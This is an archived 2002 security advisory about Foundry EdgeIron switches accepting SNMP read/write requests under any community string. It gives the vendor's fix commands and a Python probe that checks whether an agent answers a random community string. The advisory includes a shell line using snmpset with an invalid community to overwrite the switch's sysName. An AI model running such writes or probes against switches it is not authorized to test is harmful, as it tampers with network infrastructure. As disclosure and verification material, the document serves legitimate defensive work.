TUCoPS :: Network Appliances :: napl5200.htm

Foundry Networks EdgeIron SNMP opened R/W to **any** community name
21st Mar 2002 [SBWID-5200]

	Foundry Networks EdgeIron, current release as of 21 March 2002


	From advisory@prophecy.net.nz :

	Default SNMP configuration allows SNMP requests to the switch with any
	community string to have read and write access. All that is required is
	IP access to the switch.




	[prophecy@loki ~]$ snmpget public system.sysName
	system.sysName.0 =
	[prophecy@loki ~]$ snmpset totallyinvalidcommunitystring system.sysName s "0wned"
	system.sysName.0 = 0wned
	[prophecy@loki ~]$


	I have tested this both before and AFTER deleting the default SNMP
	communities from the switch. The default strings are: public (RO),
	private (RW).


	It turns out that this is less a problem, and more a 'feature' of
	these switches. The fix from Foundry is to issue the following:


	EdgeIron(config)#snmp-server security


	EdgeIron(config)#snmp-server user <name> <community-string> <ip-address>


	This then allows the specified IP to talk to the switch with that
	community string. Requests from other IPs are ignored and the
	'snmp-server security' option basically turns on the checking of
	SNMPv1 community strings.
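	The snmpget/snmpset session above and the fix described here can both be
	verified with a single check: send an SNMPv1 GetRequest for
	system.sysName.0 under a community string nobody could have configured,
	and see whether the agent answers. The script below is an added example
	written for this page, not tooling from the advisory author or Foundry.
	It hand-encodes the SNMPv1 message (BER) with no third-party library so
	the community-string handling is visible; the target host, UDP port 161
	and the SAMPLE_RESPONSE bytes are constructed for the example, not taken
	from a real EdgeIron.

```python
import os
import socket

SYSNAME_OID = "1.3.6.1.2.1.1.5.0"  # system.sysName.0, the object read and written in the advisory

def ber_len(n):
    """BER length: short form below 128, long form (0x80 | byte count) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body

def encode_int(v):
    """INTEGER in minimal two's complement; non-negative values are all SNMP needs here."""
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))

def encode_oid(oid):
    """OBJECT IDENTIFIER: first two arcs packed into one byte, remaining arcs base-128."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.insert(0, (arc & 0x7F) | 0x80)
            arc >>= 7
        body.extend(chunk)
    return tlv(0x06, bytes(body))

def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def build_snmpv1_get(community, oid, request_id):
    """Message { version 0, community, GetRequest-PDU { id, 0, 0, [(oid, NULL)] } }."""
    varbind = tlv(0x30, encode_oid(oid) + tlv(0x05, b""))
    pdu = tlv(0xA0, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)

def read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def parse_snmpv1_response(pkt):
    """Decode a GetResponse-PDU into request id, error status, echoed community and varbinds."""
    tag, msg, _ = read_tlv(pkt, 0)
    _, version, pos = read_tlv(msg, 0)
    _, community, pos = read_tlv(msg, pos)
    ptag, pdu, _ = read_tlv(msg, pos)
    if tag != 0x30 or version != b"\x00" or ptag != 0xA2:
        raise ValueError("not an SNMPv1 GetResponse")
    _, rid, pos = read_tlv(pdu, 0)
    _, err, pos = read_tlv(pdu, pos)
    _, _idx, pos = read_tlv(pdu, pos)
    _, vbl, _ = read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = read_tlv(vbl, pos)
        _, oid, vpos = read_tlv(vb, 0)
        vtag, val, _ = read_tlv(vb, vpos)
        varbinds.append((decode_oid(oid), vtag, val))
    return {"request_id": int.from_bytes(rid, "big", signed=True),
            "error_status": int.from_bytes(err, "big", signed=True),
            "community": community.decode(errors="replace"), "varbinds": varbinds}

def response_accepts_request(pkt, request_id):
    """True when the agent answered *our* request with noError, i.e. it accepted the community."""
    try:
        resp = parse_snmpv1_response(pkt)
    except (ValueError, IndexError):
        return False
    return resp["request_id"] == request_id and resp["error_status"] == 0

def probe_any_community(host, port=161, timeout=2.0):
    """Ask for sysName.0 under a random community string. An agent that still answers
    is not checking community strings at all (the advisory's default state)."""
    community, request_id = "probe-" + os.urandom(6).hex(), int.from_bytes(os.urandom(3), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_snmpv1_get(community, SYSNAME_OID, request_id), (host, port))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return False  # silence is the correct behaviour for an unknown community
    return response_accepts_request(data, request_id)

# Constructed sample, not a capture: a GetResponse echoing community "bogus" with sysName.0 = "0wned".
SAMPLE_RESPONSE = bytes.fromhex("302a0201000405626f677573a21e0201010201000201003013301106082b06010201010500040530776e6564")
```

	Run probe_any_community() against the switch before and after the two
	snmp-server commands: an unfixed switch returns True, a fixed one times
	out. Two caveats when reading the result. First, a timeout from a host
	that is not in the snmp-server user list proves only that the source-IP
	filter works, so also probe from a listed host with a wrong community to
	confirm the string itself is now checked. Second, SNMPv1 carries the
	community in cleartext over UDP, and a SET needs no reply to take
	effect, so a per-IP community binding raises the bar against a remote
	attacker but does not stop one who can sniff the string or spoof the
	permitted source address; treat it as a mitigation, not as
	authentication.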

